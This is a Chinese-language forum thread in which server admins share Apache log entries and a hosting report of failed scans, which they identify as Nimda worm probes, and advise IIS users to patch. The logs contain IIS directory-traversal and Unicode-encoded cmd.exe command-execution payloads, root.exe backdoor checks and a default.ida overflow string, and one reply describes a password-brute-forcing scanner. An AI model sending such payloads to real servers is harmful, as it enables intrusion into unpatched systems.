校長兼撞鐘 ![]() | 滿多白爛喜歡亂掃主機 無聊看了一下 Apache log 檔 , 有美國/大陸那邊有無聊人士來亂掃主機 既然要 Hack 主機 , 也要先瞭解對方主機的 OS , 我用 unix 的 OS , 他們卻都用 NT 的方式想要駭進來..... 有用 NT 的人就看一下下面的目錄裡是否有這幾個 exe 檔 , 若有的話 , 請注意吧. [client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/scripts/root.exe [client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/MSADC/root.exe [client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/c/winnt/system32/cmd.exe [client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/d/winnt/system32/cmd.exe [client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/scripts/..%5c../winnt/system32/cmd.exe [client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe [client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe [client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe [client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/scripts/..Á../winnt/system32/cmd.exe [client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/scripts/..À‾../winnt/system32/cmd.exe [client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/scripts/..Áœ../winnt/system32/cmd.exe [client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/scripts/..%5c../winnt/system32/cmd.exe [client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/scripts/..%2f../winnt/system32/cmd.exe |
回覆 |
想到再告訴你嚕 ![]() | Re: 滿多白爛喜歡亂掃主機 errrrr 跟主題沒關...只是覺得那個妹妹好cute唷.. 土大的女兒ㄇ.. ![]() |
回覆 |
會員 ![]() | 阿土兄,可能是有中nimda的電腦在掃internet上的PC.恐怕連他的主人都不知道吧 ^^! |
回覆 |
進 | Re: 滿多白爛喜歡亂掃主機 引用:
| |
回覆 |
會員 ![]() | 他們大陸有出一個掃主機的軟體,叫做流光,他會自動幫你掃出你的電腦有哪些漏洞,流光這 套軟體本身有限制他們大陸國內的ip好像不能掃,他的說明檔是說國內IP保留(指大陸),但是 可以掃台灣這邊的IP,我也用過這套軟體來掃自己的主機,他會把你的telnet,pop3,sendmail ftp及其他你開放的port相關資訊給找出來,並且會用類似密碼檔的方式來暴力破一些用白痴 密碼的帳號,基本上他程式內定對方的主機是Un*X/Win兩種主機都掃,所以才會在你的Apache Log黨內留下/script/xxxx等等的log... 在此勸告用IIS當web server的網管者,多多注意微軟方面的漏洞更新吧,目前有很多漏洞都 針對IIS而來,請自求多福..不然改天被hack了都不知道... |
回覆 |
會員 ![]() | 但是阿土兄所留的log,很明顯是中nimda的PC來攻擊所留下的,我想不會是別的入侵程式. |
回覆 |
會員 ![]() | 沒錯 阿土站長所提供的log檔是nimda探路的訊息 可以彙整後向電信警察申報 |
回覆 |
會員 ![]() | 危機四伏,我還是持功力高些再架站好了。 |
回覆 |
會員 ![]() | 這是我租的國外host網站報告, 真看不懂他們再掃啥?? ![]() File not find Report /scripts/..%255c../winnt/system32/cmd.exe /scripts/..%255c../winnt/system32/cmd.exe?/c+dir /scripts/root.exe /scripts/root.exe?/c+dir /scripts/..%5c../winnt/system32/cmd.exe /scripts/..%5c../winnt/system32/cmd.exe?/c+dir /MSADC/root.exe /MSADC/root.exe?/c+dir /c/winnt/system32/cmd.exe /c/winnt/system32/cmd.exe?/c+dir /d/winnt/system32/cmd.exe /d/winnt/system32/cmd.exe?/c+dir /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.e... /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.e... /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.e... /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.e... /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%... /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%... /scripts/..%c1%1c../winnt/system32/cmd.exe /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir /scripts/winnt/system32/cmd.exe /scripts/winnt/system32/cmd.exe?/c+dir /scripts/..%c0%af../winnt/system32/cmd.exe /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir /scripts/..%c1%9c../winnt/system32/cmd.exe /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir /scripts/..%252f../winnt/system32/cmd.exe /scripts/..%252f../winnt/system32/cmd.exe?/c+dir /default.ida /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN... /robots.txt |
回覆 |
|
XML | RSS 2.0 | RSS |
本論壇所有文章僅代表留言者個人意見,並不代表本站之立場,討論區以「即時留言」方式運作,故無法完全監察所有即時留言,若您發現文章可能有異議,請 email :[email protected] 處理。